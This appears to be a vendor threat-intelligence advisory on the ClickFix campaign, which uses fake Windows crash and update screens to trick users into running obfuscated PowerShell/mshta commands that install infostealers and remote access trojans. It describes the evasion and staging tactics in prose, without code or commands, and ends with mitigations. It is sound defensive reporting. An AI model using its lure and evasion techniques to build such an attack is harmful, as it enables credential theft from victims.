Executive Summary

The ClickFix attack represents a significant escalation in social engineering and malware delivery tactics, leveraging highly convincing fake Windows Blue Screen of Death (BSOD) and Windows Update screens to coerce users into executing malicious commands. This campaign, also known as JackFix, is distributed primarily through fake adult websites and malvertising, and is characterized by advanced obfuscation, multi-stage payload delivery, and the simultaneous deployment of multiple infostealers and remote access trojans (RATs). The attack chain exploits legitimate system utilities such as PowerShell and mshta.exe, bypassing traditional security controls and relying on user interaction rather than exploiting software vulnerabilities. The sophistication and psychological manipulation inherent in this campaign make it a critical threat to both individuals and organizations, with the potential for widespread credential theft, data exfiltration, and persistent access to compromised systems.

Threat Actor Profile

Attribution for the ClickFix campaign remains inconclusive, with no direct links to established Advanced Persistent Threat (APT) groups. However, several indicators suggest an Eastern European origin, including developer comments in Russian and the use of cloned Russian adult content platforms as lures. The threat actors demonstrate a high degree of technical proficiency, employing advanced obfuscation techniques, steganography, and multi-stage payload delivery mechanisms. Their operational tempo is rapid, with frequent updates to payloads and infrastructure, and a clear focus on maximizing infection rates through the deployment of multiple malware families in a single attack. The campaign’s infrastructure is robust, utilizing a rotating set of domains and IP addresses to evade detection and takedown efforts.

Technical Analysis of Malware/TTPs

The ClickFix attack chain is a multi-stage process that begins with user redirection to a malicious website, typically a convincing clone of a popular adult content platform. Upon interaction, the site deploys a full-screen overlay mimicking a Windows Update or BSOD event, implemented using HTML, CSS, and JavaScript. This overlay disables common escape mechanisms (such as Escape, F11, and F12 keys) and displays progress bars or error messages to heighten psychological pressure.

The user is then instructed to copy and execute a command in PowerShell or CMD, purportedly to resolve the displayed issue. This command is heavily obfuscated, often encoded as a hex or charcode array, and typically leverages mshta.exe to fetch a remote .odd file containing further obfuscated JavaScript or PowerShell code. The initial script performs several key actions:

• Downloads a large, obfuscated PowerShell payload.

• Attempts to set Microsoft Defender exclusions for attacker-controlled directories and IP addresses.

• Initiates a privilege escalation loop, repeatedly prompting the user for administrative access via User Account Control (UAC) dialogs until access is granted.

Once elevated, the script proceeds to download and execute up to eight distinct malware payloads, including the latest versions of Rhadamanthys, Vidar 2.0, RedLine, Amadey, and various custom .NET RATs and loaders. In some cases, payloads are delivered using steganography, with malicious code embedded in the color channels of PNG images and extracted by custom scripts. The deployed malware is capable of stealing credentials, browser data, cryptocurrency wallets, and providing persistent remote access for further exploitation.

Obfuscation and anti-analysis techniques are pervasive throughout the attack chain. Malicious URLs often redirect to benign sites (such as Google or Steam) when accessed directly, serving payloads only to specific PowerShell requests. The scripts are littered with junk code, random variable names, and AI-generated comments to frustrate static and dynamic analysis. The use of legitimate system utilities and user-driven execution further complicates detection and response efforts.

Exploitation in the Wild

The ClickFix campaign has been active since at least September 2025, with evidence of continuous updates and evolving payloads. Distribution is primarily achieved through malvertising on adult content sites, but instances have also been observed in phishing emails and direct messages. The campaign is browser-agnostic, functioning across Chrome, Edge, Firefox, and other major browsers, as it relies on web technologies and user interaction rather than exploiting browser vulnerabilities.

Victims are predominantly individual users, but the deployment of multiple infostealers and RATs in a single infection event poses a significant risk to organizations, particularly if a corporate device is compromised. The campaign’s infrastructure is resilient, with a rotating set of domains and IP addresses used to deliver payloads and maintain command and control (C2) channels. No exploitation of macOS, Linux, or mobile platforms has been observed as of June 2026.

Victimology and Targeting

The primary targets of the ClickFix campaign are individual users, especially those visiting adult content websites. However, the indiscriminate nature of the attack and the deployment of multiple credential-stealing malware families mean that organizational assets are at risk if a corporate device is infected. The campaign does not appear to target specific sectors or geographies, but the use of Russian-language infrastructure and lures suggests a focus on regions with significant Russian-speaking populations. The potential for lateral movement within organizational networks, credential compromise, and data exfiltration underscores the broader risk posed by this campaign.

Mitigation and Countermeasures

Organizations should implement a multi-layered defense strategy to mitigate the risk posed by the ClickFix campaign. Key recommendations include:

Blocking the identified indicators of compromise (IOCs) at the network perimeter and monitoring for connections to these domains and IP addresses. Restricting or closely monitoring the use of PowerShell and mshta.exe, particularly for non-administrative users, to prevent the execution of malicious scripts. Auditing and alerting on changes to Microsoft Defender exclusions, with particular attention to suspicious directories or IP addresses. Ensuring that endpoint detection and response (EDR/XDR) solutions are configured to detect and block obfuscated PowerShell and mshta activity, as well as the execution of known infostealer and RAT payloads. Conducting regular user education and awareness training, emphasizing the dangers of executing commands from untrusted sources or popups, especially those purporting to be Windows updates or error messages. Maintaining up-to-date backups and incident response plans to facilitate rapid recovery in the event of a successful compromise.

References

Acronis Threat Research Unit: Fake adult websites pop realistic Windows Update screen to deliver stealers via ClickFix (Nov 2025) – https://www.acronis.com/en/tru/posts/fake-adult-websites-pop-realistic-windows-update-screen-to-deliver-stealers-via-clickfix/

Malwarebytes: New ClickFix wave infects users with hidden malware in images and fake Windows updates (Nov 2025) – https://www.malwarebytes.com/blog/news/2025/11/new-clickfix-wave-infects-users-with-hidden-malware-in-images-and-fake-windows-updates

Reddit: ClickFix attack uses fake Windows BSOD screens to push malware (2025) – https://www.reddit.com/r/cybersecurity/comments/1q5c8yw/clickfix_attack_uses_fake_windows_bsod_screens_to/

Securonix: Analyzing PHALT#BLYX: How Fake BSODs and Trusted Build Tools are Used to Construct a Malware Infection – https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/

Microsoft Security Blog: Think before you Click(Fix): Analyzing the ClickFix social engineering technique – https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their supply chain and digital ecosystem. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats, ensuring robust protection for critical assets and data. For more information or to discuss how Rescana can support your organization’s cybersecurity posture, please contact us at ops@rescana.com.